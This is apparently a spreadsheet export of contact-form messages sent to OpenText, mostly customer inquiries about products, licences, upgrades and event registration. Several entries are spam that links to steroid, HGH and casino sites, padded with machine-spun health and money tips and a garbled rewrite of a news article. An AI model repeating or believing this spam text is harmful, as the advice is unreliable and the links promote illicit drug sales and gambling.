In diesem Zusammenhang stellt sich uns die Frage, ob wir hier auch unseren Rechnungseingangs- und Freigabe-Prozess ändern sollen. Hier wurde uns von Beratern OpenText empfohlen._x000D_
Wir verwenden derzeit bereits ein Tool, mit dem wir die Rechnungen scannen, validieren, archivieren und einen Freigabe-Workflow starten._x000D_
Derzeit haben wir den Rechnungseingangsworkflow bei ca. 20 Buchungskreisen aktiv. Da wir diesen Prozess aber gerade noch auf die Ländergesellschaften ausrollen, werden es laufend mehr._x000D_
Wäre es möglich, einmal ein erstes kurzes Telefongespräch zwischen Ihnen, unserem Buchhaltungsleiter für DE und CH Herr Stiefel und mir einzuplanen?_x000D_
Könnten Sie mir da ein oder zwei Terminvorschläge schicken? Ich arbeite nur halbtags, daher wäre mir ein Vormittagstermin lieber. _x000D_
vielen Dank + viele Grüße_x000D_
Sonja Birrey_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir or Madam_x000D_
_x000D_
for the preparation of court proceedings we are looking for an eDiscovery tool.  _x000D_
_x000D_
For the court proceedings we need to assess documents within a five digit number and search them for specific keywords.  After this is done, we want the filtered documents to be examined by our colleagues whether or not they are relevant for the proceedings.  _x000D_
_x000D_
During my search for an eDiscovery tool I also came across your homepage.  Hence, I want to ask whether you have a tool that would fit our needs and if you could provide us with an offer.  In case you should need more information please do not hesitate to contact me (email preferred)._x000D_
_x000D_
Thank you very much in advance._x000D_
_x000D_
Best regards_x000D_
Ramón Glaßl</t>
  </si>
  <si>
    <t>Derzeit nutzen wir VIM 7.5 SP 7. Bei den Planungen für den Wechsel nach SAP S/4 HANA stellte sich die Frage, ob wir mit dem Wechsel von VIM 7.5 nach 16.3 eine zusätzliche bzw. eine neue Lizenz oder anderen Wartungsvertrag benötigen oder ob der Wechsel nach VIM 16.3 für S/4 HANA im aktuellen Vertrag inkludiert ist (Vertragsnummer 73025583).</t>
  </si>
  <si>
    <t xml:space="preserve">Reference from LinkedIn for sales opportunity. </t>
  </si>
  <si>
    <t>We are looking for suppliers for sms messaging services in the US aimed at US consumers.</t>
  </si>
  <si>
    <t>Dear madam, sir, _x000D_
_x000D_
While trying to add sessions for EW18 to my agenda, I get an error message that my e-mail address is unknown. I have registered for the event using the e-mail address listed above. _x000D_
Can you please help me fix this issue? _x000D_
_x000D_
Thanking you in advance._x000D_
_x000D_
Kind regards, _x000D_
Femke Mennen</t>
  </si>
  <si>
    <t>Hi, _x000D_
the TU Berlin is implementing the Archive Server Storage Platforms. Therefore we will buy a Storage System that needs to be supported. Would it be possible to send me the latest "Archive Server Storage Platforms Release Notes" across. Thanks in advance. _x000D_
Best, Jonas</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.columnconcepts.com/database/bage.php?cont=556-Drostanolone-Wholesale-Methenolone-Oral-Tadalafil-Supplier.html]Drostanolone Wholesale[/url]_x000D_
 A significant tip in relation to intelligent charge card use is, resisting the desire to use cards for cash advances. By refusing to get into credit card resources at ATMs, you will be able to protect yourself from the frequently expensive rates of interest, and charges credit card companies typically demand for these kinds of providers._x000D_
  [url=http://www.automationchain.com/images/away.php?drop=Clomiphene-Citrate-Sale-Buy-Tren-Acetate-Uk-Trenbolone-Acetate-Generic-Supplements-455/]Clomiphene Citrate Sale[/url]_x000D_
 When dealing with cancer you should surrounds on your own with others that will truthfully listen to your thoughts and feelings without the need of verdict. There are actually times when you might be furious, disappointed or unfortunate and you have to be able to convey individuals thoughts publicly and honestly when required._x000D_
  [url=http://www.go-cvs.com/images/near.php?loop=1237-Testosterone-Cypionate-For-Sale-Philippines-Oxandrolone-For-Sale-Oxymetholone-Dosage.html]Testosterone Cypionate For Sale Philippines[/url]_x000D_
 1 good strategy to utilize when you are in the center of a panic attack is to reduce your gaze. When our systems enter in a state of hysteria, our eyes are extremely-hypersensitive. Consequently the lighting and also other things that we see can certainly make stuff worse compared to they are._x000D_
  [url=http://m.pcflv.org/contact/state.php?f=156-Hgh-Wachstumshormon,Jintropin-Hgh-Price,Hygetropin-Asia]Hgh Wachstumshormon[/url]_x000D_
</t>
  </si>
  <si>
    <t>Automated redaction</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.senhordobonfim.net/share/state.php?li=300]Android Tablet With Gps[/url]_x000D_
 Be prepared to learn about new ethnicities and other people. Do not acquire slim-minded tips on your travels. You will certainly be reaching and getting together with a variety of individuals plus they might have different tips than you may have. If you are judgmental, you will probably skip a lot of the good thing about your spot._x000D_
  [url=http://www.ariaaelectric.com/cache/crypt.php?ou=855]Testosterone Sale Canada[/url]_x000D_
 Acne breakouts flaring up "?calm down! Individuals need to appreciate exactly how much their passion and stressful scenarios could affect their skin area and cause skin breakouts along with other pimples related concerns. General, specifically during teenage years, human hormones are racing throughout the body and a lot of situations are transforming. Your body may begin to create a lot more oil than organic along with the basic pressure of adulthood may possibly lead you to breakout._x000D_
  [url=http://www.compsistem.com.br/css/content.php?w=63]Anadrol Price Usa[/url]_x000D_
 Use other get in touch with mediums apart from e-mail. E-mail is very good at receiving enterprise, there is however a whole lot more you can do. Question your checklist for his or her house addresses and cellphone numbers, as well. Question them if they want to receive texts. Differing people like different forms of make contact with and being aware of their tastes enables you to use one which will likely be most well received._x000D_
  [url=http://www.absolutemassage.org/confuse/coat.php?about=693]Dianabol Side Effects For Men[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I am developer from DXC,  helping our client to develop in teamsite,I am writing to ask for few questions about the import file size in Teamsite._x000D_
_x000D_
1.	What is the maximum import file size limitation in Teamsite, and _x000D_
2.	Since the clients cannot import a more than 100MB file into Teamsite , so asking for do there have any config that could larger the file size importation._x000D_
_x000D_
If there is solution to have configuration about larger the import file size could you please provide the solution?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Best Regards,_x000D_
Catherine_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir,_x000D_
_x000D_
Hereby we inform you that we would like to stop this automatically subscription_x000D_
by not renewing it._x000D_
_x000D_
We will ask our Credit Card provider to recover this automatically payment._x000D_
_x000D_
We couldn’t react on time on this email do to a period of no good working of _x000D_
internet connection  and we read this email to late ._x000D_
_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Mircea Simoiu_x000D_
</t>
  </si>
  <si>
    <t>Inquiry for Documentum as DMS company wide solution for DMCI</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know how much time would it take if we want to inhouse the infoarchive solution, the overall cost related to it, features like audit, search, data access etc? _x000D_
</t>
  </si>
  <si>
    <t>I'm exploring different DAMs for one of the opportunity.  Especially the DAM which have feature parity with MAMs (Media Access Management systems).  Please can you guide me what is the best way to explore opentext especially if there are any demos recorded or any test system which I can explore.  If there are any documentation on the feature parity with MAMs that will be helpful.</t>
  </si>
  <si>
    <t>3 card poker online casino _x000D_
[url=http://bablcasinogames.com/]slots deco[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;baccarat pressure cooker 7 litre&lt;/a&gt; _x000D_
quatro casino no deposit bonus _x000D_
[url=http://casino-online.us.com/]casino bonus bez depozita[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;fruit machine jackpot key&lt;/a&gt; _x000D_
no deposit bonus forex brokers _x000D_
[url=http://real777money.com/]free online casino games bodog[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;no deposit bonus grand fortune casino&lt;/a&gt; _x000D_
casino xmas party _x000D_
[url=http://casinoveganonline.com/]casino 7777[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online slots uk reviews&lt;/a&gt; _x000D_
mobile casino games south africa _x000D_
[url=http://casino24list.com/]online casino wiki[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slot sites 2017&lt;/a&gt; _x000D_
no deposit bonus high noon casino</t>
  </si>
  <si>
    <t>slot planet _x000D_
[url=http://bablcasinogames.com/]no deposit bonus online casino 2017[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;casino hull&lt;/a&gt; _x000D_
online slots south africa _x000D_
[url=http://casino-online.us.com/]online casino free spins real money[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;slots no deposit bonus codes&lt;/a&gt; _x000D_
online slots win real money usa _x000D_
[url=http://real777money.com/]online casino marketing strategy[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;blonde poker&lt;/a&gt; _x000D_
elder scrolls online quick slot _x000D_
[url=http://casinoveganonline.com/]roulette free 10 pound no deposit[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online casino no deposit bonus keep winnings usa&lt;/a&gt; _x000D_
no deposit bonus keep winnings _x000D_
[url=http://casino24list.com/]casino x no deposit bonus[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;android online casino&lt;/a&gt; _x000D_
online roulette mobile</t>
  </si>
  <si>
    <t>Looking for job change in data scientist role.</t>
  </si>
  <si>
    <t>Need to implement DMS</t>
  </si>
  <si>
    <t>Automated system for vendor payments/invoice</t>
  </si>
  <si>
    <t>2012 election_x000D_
_x000D_
(cnn) in which not often that marilyn and i toot our personal horn, hence impress are suffering from a few minutes._x000D_
_x000D_
in the united states race, individuality and so the government collection gained second place in the grouping/Project from the population in support of facets blogging excellence 25th annual generating in Feature tournament._x000D_
_x000D_
Moni Basu, sara Blake, Jen Christensen not to mention Todd Leopold invented experiences that's investigated battle, personality and as well the government killing the 2012 presidential election._x000D_
_x000D_
perused these top equipment:_x000D_
_x000D_
the most important optics ture of state policies: observing email campaigns by having a modern kaleidoscope_x000D_
_x000D_
keep going vibrant shop Democratic congressman active in the clear southwest matches during political success_x000D_
_x000D_
civil privileges tattoo struggling on differ one documented voter at once,several times a day_x000D_
_x000D_
Parallels to positively spot hateful previous years stay with day of the federal government_x000D_
_x000D_
we have privileged for the recognition so next pleased to our market: say thank you._x000D_
_x000D_
See the involving invariably winners so now._x000D_
_x000D_
by just Halimah Abdullah, fox news_x000D_
_x000D_
wa (cnn) Republican k. Carl bush can be dark-colored and he knows that the GOP racial reckoning triumphed in are taken from 100 url reports from collectively headquarters with fastidiously worded prescription medications heading to soulmates. the particular boat transition was needed to wring the GOP graphic as a celebration of age-old, white-colored and thus culturally covered persons will be needing the serious grassroots shakeup that might make some for the GOP apprehensive._x000D_
_x000D_
developed your good corporation Republicans who want to keep issues any similar, said mason, a military experienced person what individuals were raised in birmingham, al the actual city liberties era. condition quo needs to check numerous, I successful voice multiplicity instructional classes, while i only say freedom training s</t>
  </si>
  <si>
    <t>Job post</t>
  </si>
  <si>
    <t>Interested in an e-Fax solution for a new program within Amazon.</t>
  </si>
  <si>
    <t>I Need access to Documentum knowledge base but former access has not been transferred to OpenText, and I cannot seem to submit anything from the Support page._x000D_
We are still running EMC Documentum Content Server (version 6.7.1000.0038  Win64.SQLServer) and need access to documentation._x000D_
docbase_id = 1282013 (Production environment)_x000D_
docbase_id = 1282014 (Test environment)</t>
  </si>
  <si>
    <t>Need to quickly set up a new lifesciences document management system for FDA regulatory filings and also need to import data from an older existing documentum cabinet instance. I need to understand what your SW supports and how this can be quickly implemented and brought online.</t>
  </si>
  <si>
    <t>Exstream Advance Table Training Q &amp; A Time to secure training on site 08/06 - 08/09</t>
  </si>
  <si>
    <t>I want to know about your pricing, if I want this solution for our customers in Canada._x000D_
Also, I want to know if there is a way of managing and monitoring multiple accounts from a single (Master) one?_x000D_
_x000D_
Thanks_x000D_
Vincent</t>
  </si>
  <si>
    <t>Want access to OT My Support site.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Pouvez-vous svp me contacter, j'aimerais avoir plus d'informations sur votre solution de contract management ?_x000D_
Merci._x000D_
Cordialement,_x000D_
Florent Jannier</t>
  </si>
  <si>
    <t>No phone calls please. Could you please give me an estimated cost of an e fax solution for 20 users? Also, do you offer discounts for non-profits? Thank you for your time.</t>
  </si>
  <si>
    <t>Inquire about specific OpenText Exstream capabilities and perhaps request a demo to see if the product will provide the technical solution we are looking for.</t>
  </si>
  <si>
    <t xml:space="preserve">Job application </t>
  </si>
  <si>
    <t>REQUERIMOS INFORMACIÓN ACERCA DE DOCUMENTAL CAPITAL, QUE LO MANEJABA DEL Y QUE FUE COMPRADO POR OPEN TEXT, CON LA FINALIDAD DE QUE UN ASESOR NOS PUEDA VISITAR Y EXPLICAR AMPLIAMENTE DE SUS SERVICIOS DE CONTROL DOCUMENTAL</t>
  </si>
  <si>
    <t>The company handling our support went out of business and we are unsure how to continue support/upgrades.  Thank you.</t>
  </si>
  <si>
    <t>Hi. I have already registered and paid for Enterprise world 2018, however, I received an email from Open Text for free registration. I am registering my supervisors Dan Botari and Mark Jungjohann for Enterprise world with the coupon code EW18WELCOMEVIP, however the coupon code keeps telling me it does not apply... Can you please give me a call when you see this?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Marcel Merola</t>
  </si>
  <si>
    <t>We use Liquid Office for our workflow system at Validus, and a DMS product called iManage Work 10.  It sounds like OpenText and iManage are no longer working with each other according to our system integrator.  Wondering if OpenText has a DMS alternative, and would like to discuss the roadmap for Liquid Office.</t>
  </si>
  <si>
    <t>Hi, TFL have been in contact with me in regards to the below, please could someone get in contact with me for pricing?_x000D_
Brava Publishing Visual Rights	Brava Publishing Visual Rights by IGC</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My name is Amine Dehmani and I work for a financial services company out in Ohio. I’m one of the developers here tasked to do research on vendors for an upcoming Vendor Review session._x000D_
I’m doing research on OpenText as we already use it and I’m trying to find out what is new with OpenText in general._x000D_
_x000D_
My review encompasses both portal as well as CMS. I’m just looking for general information such as the content management currently offered by OpenText, as well as the stack of technologies that can be used with your products. _x000D_
_x000D_
We currently develop jsr 168 and jsr 286 portlets. But we started to think about changing our architecture to be perhaps more service oriented._x000D_
_x000D_
I would like to know what kind of applications can be hosted under OpenText products, let’s say if we want to move the direction of Spring Applications, web services with froent end technologies such as Angular etc. what technologies open text can or cannot support._x000D_
_x000D_
Is there any way I can discuss with someone knowledgeable about OpenText products to see what some of our options might be._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I have a customer that is looking to renew their support for OpenText. Do you work with resellers to process support contracts? If so, have you worked with Softchoice in the past?</t>
  </si>
  <si>
    <t>Your company is using my family last name (been around way before your company) for profit. Not cool.</t>
  </si>
  <si>
    <t>We are currently looking at different document management products and were told that Edocs could be a solution for us.  I would like to chat with someone about this product and setup a demo for our team._x000D_
_x000D_
Thanks Connie</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Opentext,_x000D_
 _x000D_
Hope you're doing well !_x000D_
 _x000D_
My name's Mikhail, and I represent an IT recruitment company IT Atlas, based in Moscow, Russia. _x000D_
 _x000D_
Our team provides searching and recruitment of high-qualified staff for IT companies all over the globe.   _x000D_
 _x000D_
Have you considered Russian and CIS programmers as a good assistance in developing your project or product?_x000D_
 _x000D_
We have people with strong developing background who can become a great source of new ideas and approaches for_x000D_
your team. We know the market from top to bottom, and can recommend the best hire for in-office or remote_x000D_
vacancies opened in your company._x000D_
 _x000D_
You are welcome to contact me on any question you may have about the future cooperation on IT talent search._x000D_
 _x000D_
With best regards !_x000D_
_______________x000D_
 _x000D_
Business Development Executive at IT Atlas_x000D_
P _x000D_
+7 (951) 095-95-72_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Huf NA and Huf MX are looking to establish a direct connect with our partners.  One of our biggest customers is Discount Tire.  The EDI contact at Discount Tire said they only use OpenText and do not have the ability to make a direct connect.  We need to discuss this project with a representative at OpenText.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a Subscription option on the OpenText website to be notified of the latest versions/releases/patches for the following products: _x000D_
_x000D_
1.	Exceed_x000D_
2.	Brava! Enterprise_x000D_
3.	My Documentum for Microsoft Outlook_x000D_
4.	Office Editor_x000D_
_x000D_
_x000D_
Kindly provide the necessary URL link and steps on how I can subscribe. Or please redirect me to the correct group for this enquiry._x000D_
</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
we would like to move towards the Appworks platform would like to have the installation files for the development environment so that we can familiarise ourselves with  it</t>
  </si>
  <si>
    <t>Interested in Actuate BIRT Scorecard software for Electrical Utilities: Specs. Prices, Representatives in South Africa, etc</t>
  </si>
  <si>
    <t xml:space="preserve">We as APTUIT already got in touch with your Italian Sales office in 2015 for a preliminary quotation;  now we are interested  with a refreshed quotation after we have been reading of your acquisition of the former Documentum </t>
  </si>
  <si>
    <t xml:space="preserve">First  page  ranking on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Confirmation on Software Assurance and Support</t>
  </si>
  <si>
    <t>Hallo, wir würden Sie gerne im Rahmen einer Ausschreibung für ein DMS/ECM System beteiligen, aber das geht nur wenn ich für die Ausschreibung auch eine E-Mailadresse von Ihnen vorweisen kann. Auf den Webseiten Ihres Unternehmens finde ich nur Telefon,- oder Faxnummern, aber keine E-Mailadresse._x000D_
Können Sie mir da bitte weiterhelfen?_x000D_
Mfg_x000D_
Andreas Schönwald</t>
  </si>
  <si>
    <t>We need your feedback on whether Exceed is currently compatible and supported on Windows 10 64-bit._x000D_
_x000D_
-          If yes, what version(s) of Exceed is compatible and supported?_x000D_
-          If no, is it in your product roadmap and when can we expect it?_x000D_
-          Is it supported to run in a virtualised environment i.e. Citrix?_x000D_
_x000D_
Regards,_x000D_
Nathan</t>
  </si>
  <si>
    <t>my fax was not delivered to_x000D_
 18882711358@faxmail.com_x000D_
Can you tell me why not?</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
We have an urgent discovery task and I would like someone to contact me to discuss scope, timing and cost._x000D_
_x000D_
Kind regards_x000D_
James</t>
  </si>
  <si>
    <t>canberra casino _x000D_
[url=http://casino2018money.com/]online roulette 50p[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;online slots sa&lt;/a&gt; _x000D_
888 casino _x000D_
[url=http://casino-online.us.com/]online casino pay by phone[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;casino bonus 1500 free&lt;/a&gt; _x000D_
online roulette rigged _x000D_
[url=http://real777money.com/]new slot[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;no deposit bonus codes netent&lt;/a&gt; _x000D_
big online slot wins _x000D_
[url=http://casinoveganonline.com/]casino 889[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;play real casino slots online&lt;/a&gt; _x000D_
online roulette minimum bet 10p _x000D_
[url=http://casino24list.com/]best gambling offers[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online roulette usa real money&lt;/a&gt; _x000D_
no deposit bonus fx</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require the hostess to spend row hours in the kitchen, so this food is usually better correct  prepare on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are good suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/canned-stewed-tomatoes-recipe-delicious-simplicity]canning stewed tomatoes recipe[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to the knowledge base to troubleshoot an issue where Reserved spreadsheet intermittently saves documents, but displays a message "You are closing the livelink document ... To complete the edit session, choose one of the following: 1) save the changes to livelink, 2) save a copy or 3) discard the changes. Refresh the browser hosting this edit session </t>
  </si>
  <si>
    <t xml:space="preserve">Evaluating several products for our IT department, need direct contact/ salesperson for requesting onboarding documentation.   Please contact me soon.  We are located in San Diego, CA. </t>
  </si>
  <si>
    <t>I am interested in connectors for Sharp MFPS.  I am a Sharp dealer.</t>
  </si>
  <si>
    <t>I am upgrading the right fax database server to SQL Server 2012. Can you tell me what version of RightFax supports SQL Server 2012?  We are currently on version 10.6 I believe._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a 2-user Perpetual license for Exstream Dialogue, _x000D_
need to release one license to move Exstream to new PC._x000D_
Can you help ?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I’m reaching out to see if OpenText has an interest in a technology partner that can deliver 100+ connectors to SaaS, on-premise, Big Data &amp; NoSQL data sources._x000D_
 _x000D_
CData Software partners with companies like Tableau, TIBCO, Datawatch, Matillion, CA Technologies, and Sisense._x000D_
These companies all recognized the need to empower their customers through offering a wider range of data connectivity options to their customers._x000D_
 _x000D_
Some of our most popular connectors are Salesforce, Facebook, Netsuite, Google Analytics, MongoDB, Google BigQuery and SharePoint._x000D_
 _x000D_
How complete is your data connectivity story?_x000D_
Can we talk more about how we might partner?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Jessica Cappuccio on my team canceled her reservation recently.  I was wondering if I could have someone replace her if possible.  Is registration still open if I have another team member interested in attending?  </t>
  </si>
  <si>
    <t>seeking new solution for integrated electronic records management</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a new Document Management system with a wide array of capabilities and was wanting to see if i could get a demo set up for some time next week or the following week to see what OpenText has to offer. Please let me know if there is any availability to talk and if we can get some sort of meeting set up. </t>
  </si>
  <si>
    <t xml:space="preserve">Please tell me what version of your product supports TLSv1.2 </t>
  </si>
  <si>
    <t>we have a support agreement for AppXtender. However, we did not receive the annual renewal invoice back in December 2017. Can you please look us up and send? Thank you. The RadNet I belong to is at 1510 Cotner Avenue (Corp HQ), Los Angeles, CA 90025. I see you have several listed.</t>
  </si>
  <si>
    <t>Product Inquiry</t>
  </si>
  <si>
    <t>Looking for a user guide for Opentext Exceed OnDemand 14. I see there is a version 15 but we have version 14 here and a user is asking for information on how to use the software. Thanks, Dave</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to evaluate the opentext Capture Center software.  </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.baileypinney.com/ileypiiinney/state.php?c=16-Jintropin-Fake,Igf-1-Lr3-Vs-Hgh,Igf-1-Spray-Uk]Jintropin Fake[/url]_x000D_
 Do not let unidentified irritation go unwatched. There are many good reasons you could really feel discomfort with your tooth or jaw. You could be experiencing and enjoying the reducing of the information teeth or you might have produced an infection. Make an appointment with your dental office as quickly as possible to avoid further more issues. It is best to know it can be slight, rather than to disregard it right up until it really is significant._x000D_
  [url=http://www.tomo.lv/includes/publish.php?simple=Clomiphene-Citrate-Cost-Australia-Oxandrolone-Uk-Testosterone-Isocaproate-Uses-440/]Clomiphene Citrate Cost Australia[/url]_x000D_
 Consider care and attention after using the toilet and wash from your top to back, as opposed to the straight back to top. In the event you don't, you happen to be taking a chance on the likelihood of making a candida. By cleaning from your front side to back again, you are eliminating the distribute of unwanted organisms out of your anus to the genital location._x000D_
  [url=http://www.sorobit.net/wp-content/uploads/fustanella.php?page_id=752-Nandrolone-Decanoate-Powder-Price,Buy-Stanozolol-Tablets-Australia,Mesterolone-Canada]Nandrolone Decanoate Powder Price[/url]_x000D_
 Contact the payday advance firm if, you do have a trouble with the repayment schedule. What you may do, don't vanish. These firms have relatively hostile choices departments, and can often be difficult to cope with. Before they think about you delinquent in pay back, just call them, and let them know what is happening._x000D_
  [url=http://www.portaltvinc.com/includes/confuse.php?ti=1301-Testosterone-For-Sale-With-Credit-Card,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia/]Testosterone For Sale With Credit Card[/url]_x000D_
</t>
  </si>
  <si>
    <t>reset my password</t>
  </si>
  <si>
    <t>Encase Enterprise crashes</t>
  </si>
  <si>
    <t>Need to upgrade to V9 to V16</t>
  </si>
  <si>
    <t>Need a price quote for:  MBPM V7 Named User Maintenance S-MT-MSC01-EV7_M QTY: 80 End User: US Department of State - International Security of Nonproliferation Start date: Sept 30,2018 Exp date: Sept 29, 2019	_x000D_
_x000D_
QTY: 1_x000D_
_x000D_
Washignton DC 20520</t>
  </si>
  <si>
    <t xml:space="preserve">I need access to Opentext documentation.  We are a SAP/ILM and Opentext customer Please contact me to share _x000D_
All of the documentation on SAP Document Access &amp; Archiving (including ArchiveLink and DocuLink interfaces) is found here:_x000D_
_x000D_
 _x000D_
Specific descriptions of DocuLink are contained within the Customization and Administration Guide, including defining attributes, nodes, folders, views, authorization, GUIs, (etc.), found here:_x000D_
_x000D_
Configuration and use of DocuLink and Archive link is explained in the Scenario Guide found here:_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need access to Opentext documentation.  We are a SAP/ILM and Opentext customer Please contact me to share _x000D_
All of the documentation on SAP Document Access &amp; Archiving (including ArchiveLink and DocuLink interfaces) is found here:_x000D_
_x000D_
Specific descriptions of DocuLink are contained within the Customization and Administration Guide, including defining attributes, nodes, folders, views, authorization, GUIs, (etc.), found here:=_x000D_
 _x000D_
Configuration and use of DocuLink and Archive link is explained in the Scenario Guide found here:=_x000D_
</t>
  </si>
  <si>
    <t>Renewal 12 MBPM V7 Name User Maintenance 01/08/18-07/31/19</t>
  </si>
  <si>
    <t>Web/ Enterprise Content Management Solution required for one of our clients which is a big Research and Academic organization in Saudi Arabia. Investment in 1 st year around 50,000 USD to 1,00,000 USD, followed by further investment in next 5 years.</t>
  </si>
  <si>
    <t>online casino business _x000D_
[url=http://casino2018money.com/]roulette free ladbrokes[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;online roulette live casino&lt;/a&gt; _x000D_
4grinz no deposit bonus _x000D_
[url=http://casino-online.us.com/]top online casino 2014[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;soaring eagle casino let's make a deal&lt;/a&gt; _x000D_
elder scrolls online quick slot _x000D_
[url=http://real777money.com/]slots vegas[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;slot joint&lt;/a&gt; _x000D_
online roulette for money usa _x000D_
[url=http://casinoveganonline.com/]online roulette algorithm calculator[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online slots scams&lt;/a&gt; _x000D_
77 jackpot no deposit bonus _x000D_
[url=http://casino24list.com/]no deposit bonus nz[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino&lt;/a&gt; _x000D_
virtual gambling games</t>
  </si>
  <si>
    <t>I'm trying to find out bandwidth utilisation levels for Open Text Content Suite 16 when deployed via AWS...this is on behalf of a client we're doing a Cloud Readiness Assessment for._x000D_
Thanks_x000D_
Tim</t>
  </si>
  <si>
    <t xml:space="preserve">Hello , I am an immigrant entrepreneur women. My company assisting employers with grand applications_x000D_
_x000D_
I was wondering would you be able to provide complementary ticket. I can’t effort this right now._x000D_
Thank you,_x000D_
Lutfiye Tutak </t>
  </si>
  <si>
    <t>Wir interessieren uns für den digitalen Personalakt, und benötigen (falls dies angeboten wird) eine Präsentation bei uns Standort.</t>
  </si>
  <si>
    <t>Need a quote for 1 fax line with 1 user</t>
  </si>
  <si>
    <t>GOLD TRADED AURORA MATCHBOX TAX RETURN Sydney 500 2010 Slot Cars Mag-racing  401 Cherry Valley AVE, West Hemp-stead,. N.Y. USA 11552 4 Victoria St Midland, WA 6056.</t>
  </si>
  <si>
    <t>Transnet are currently running Archive server 10.5 , when will we be due to an upgrade to the latest version of opentext archive server versions. Can it it run with HANA database?</t>
  </si>
  <si>
    <t xml:space="preserve">We process anywhere between 200 - 2000 manual order forms a day as we are an mail order company. What we want to look at is getting some form of OCR/ICR software which could read the order forms into our system rather than manually keying them all on. </t>
  </si>
  <si>
    <t>10 free no deposit slots _x000D_
[url=http://casino2018money.com/]slot traduction[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;casino table hire perth&lt;/a&gt; _x000D_
online casino quebec _x000D_
[url=http://casino-online.us.com/]fruit machine name chooser[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;roulette online chat&lt;/a&gt; _x000D_
win real money at online casino slots _x000D_
[url=http://real777money.com/]new zealand online slots[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online roulette scam&lt;/a&gt; _x000D_
darwin casino _x000D_
[url=http://casinoveganonline.com/]free bets royal ascot[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online roulette kostenlos ohne anmeldung&lt;/a&gt; _x000D_
kerching casino free slots _x000D_
[url=http://casino24list.com/]online roulette prediction software[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;duck poker no deposit bonus&lt;/a&gt; _x000D_
baccarat artisan</t>
  </si>
  <si>
    <t>I have been asked to 'open document' to enable me to print same.  How do I do this?  I have a Toshiba Satellite.</t>
  </si>
  <si>
    <t>Abfrage: Status GLS_x000D_
SQL-Base Lizenznehmer: 10579939_x000D_
Team Developer Lizenznehmer: 10632767</t>
  </si>
  <si>
    <t>Can I get a formal confirmation quote, based on two options, for providing Brava to our business based on the CXL option on your website. Quote 1 to be based on 6No individual licences installed on separate machines while Quote 2 will be for a 10 seat network set up. Please detail all renewal, maintenance costs etc applicable in future years. Should you need any further information please give me a call.</t>
  </si>
  <si>
    <t>I have downloaded the newest version and every time I want to open a tif file I get the following error: "This file format is not licensed or an embedded file is not licensed"_x000D_
Could you please assist asap._x000D_
Thank you</t>
  </si>
  <si>
    <t>Dear,_x000D_
We are seeking for Content Management System, so kindly I hope if you can present the OpenText demo for us in our office in Dubai_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>Since Imadiff is no more FirstClass supplier, I'm searching for a company which could support and maintain my FirstClass Server._x000D_
I need french support as I don't speak english (I write and read it but don't speak)._x000D_
Have you an official representative for french speaking belgian peoples (no dutch !)._x000D_
Thanks._x000D_
_x000D_
Raymond Studer.</t>
  </si>
  <si>
    <t>We are building a DAM (Digital Asset management) Software which would have the integration to the Scanner devices and looking for the the Captia PixTools Toolkit / SDK (ISIS Driver), Please point us to the right contact.</t>
  </si>
  <si>
